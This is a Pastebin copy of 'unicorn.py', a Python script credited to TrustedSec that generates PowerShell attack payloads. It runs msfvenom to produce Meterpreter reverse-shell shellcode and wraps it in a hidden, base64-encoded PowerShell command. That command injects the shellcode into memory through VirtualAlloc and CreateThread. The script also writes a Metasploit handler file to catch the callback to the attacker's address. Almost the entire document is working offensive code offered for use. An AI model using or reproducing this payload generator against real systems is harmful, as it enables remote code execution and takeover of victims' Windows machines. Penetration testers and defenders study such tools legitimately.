opexxx

unicorn.py

Mar 7th, 2014
269
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.43 KB | None | 0 0
  1. #!/usr/bin/python
  2. #
  3. # Magic Unicorn - PowerShell downgrade attack tool
  4. #
  5. # Written by: Dave Kennedy (@dave_rel1k)
  6. # Company: TrustedSec (@TrustedSec) https://www.trustedsec.com
  7. #
  8. # Real quick down and dirty for native x86 powershell on any platform
  9. #
  10. # Usage: python unicorn.py payload reverse_ipaddr port
  11. # Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
  12. #
  13. # Requirements: Need to have Metasploit installed.
  14. #
  15. # Special thanks to Matthew Graeber and Josh Kelley
  16. #
  17. import base64
  18. import re
  19. import subprocess
  20. import sys
  21.  
  22. # generate base shellcode
  23. def generate_shellcode(payload,ipaddr,port):
  24.     port = port.replace("LPORT=", "")
  25.     proc = subprocess.Popen("msfvenom -p %s LHOST=%s LPORT=%s c" % (payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
  26.     data = proc.communicate()[0]
  27.     # start to format this a bit to get it ready
  28.     repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'buf=' : ''}
  29.     data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
  30.     return data
  31.  
  32. def format_payload(payload, ipaddr, port):
  33.     # generate our shellcode first
  34.     shellcode = generate_shellcode(payload, ipaddr, port).rstrip()
  35.     # sub in \x for 0x
  36.     shellcode = re.sub("\\\\x", "0x", shellcode)
  37.     # base counter
  38.     counter = 0
  39.     # count every four characters then trigger floater and write out data
  40.     floater = ""
  41.     # ultimate string
  42.     newdata = ""
  43.     for line in shellcode:
  44.         floater = floater + line
  45.         counter = counter + 1
  46.         if counter == 4:
  47.             newdata = newdata + floater + ","
  48.             floater = ""
  49.             counter = 0
  50.  
  51.     # heres our shellcode prepped and ready to go
  52.     shellcode = newdata[:-1]
  53.    
  54.     # one line shellcode injection with native x86 shellcode
  55.     powershell_code = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
  56.     full_attack = "powershell -nop -wind hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le'))  
  57.  
  58.     # write out powershell attacks
  59.     filewrite = file("powershell_attack.txt", "w")
  60.     filewrite.write(full_attack)
  61.     filewrite.close()
  62.  
  63.     # write out rc file
  64.     filewrite = file("unicorn.rc", "w")
  65.     filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n" % (payload,ipaddr,port))
  66.     filewrite.close()
  67.  
  68.     print "[*] Exported powershell output code to powershell_attack.txt."
  69.     print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute."
  70.  
  71. # pull the variables needed for usage
  72. try:
  73.  
  74.     payload = sys.argv[1]
  75.     ipaddr = sys.argv[2]
  76.     port = sys.argv[3]
  77.     format_payload(payload,ipaddr,port)
  78.  
  79. # except out of index error
  80. except IndexError:
  81.  
  82.     print r"""
  83.                                                         ,/
  84.                                                        //
  85.                                                      ,//
  86.                                          ___   /|   |//
  87.                                      `__/\_ --(/|___/-/
  88.                                   \|\_-\___ __-_`- /-/ \.
  89.                                  |\_-___,-\_____--/_)' ) \
  90.                                   \ -_ /     __ \( `( __`\|
  91.                                   `\__|      |\)\ ) /(/|
  92.           ,._____.,            ',--//-|      \ |  '   /
  93.          /     __. \,          / /,---|       \      /
  94.         / /    _. \ \       `/`_/ _,'        |     |
  95.        |  | ( (  \  |      ,/\'__/'/          |     |
  96.        |  \ \`--, `_/_------______/           \(   )/
  97.        | | \ \_. \,                            \___/\
  98.        | |  \_   \ \                                \
  99.        \ \   \_ \  \  /                             \
  100.         \ \ \._  \__ \_|       |                       \
  101.          \ \___  \     \      |                        \
  102.           \__ \__ \ \_ |       \                        |
  103.           |  \_____ \ ____      |                        |
  104.           | \ \__ ---' .__\    |        |               |
  105.           \ \__ ---   /   )     |        \             /
  106.            \  \____/ / ()(      \         `---_       /|
  107.             \__________/(,--__    \_________.    |    ./ |
  108.               |     \ \ `---_\--,           \  \_,./   |
  109.               |      \ \_ ` \   /`---_______-\  \\    /
  110.                \     \.___,`|   /              \  \\   \
  111.                 \    |  \_ \|   \             (   |:    |
  112.                  \   \     \   |             /  / |    ;
  113.                   \   \     \   \         ( `_'   \ |
  114.                    \.   \     \.   \         `__/   |  |
  115.                      \  \      \.  \               |  |
  116.                       \  \       \ \              (  )
  117.                        \  |        \ |              |  |
  118.                         |  \        \ \             I  `
  119.                         ( __;        ( _;            ('-_';
  120.                         |___\       \___:            \___:
  121. """
  122.     print "Real quick down and dirty for native x86 powershell on any platform"
  123.     print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com"
  124.     print "Happy Magic Unicorns."
  125.     print "\n"
  126.     print "Usage: python unicorn.py payload reverse_ipaddr port"
  127.     print "Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443"
Add Comment
Please, Sign In to add comment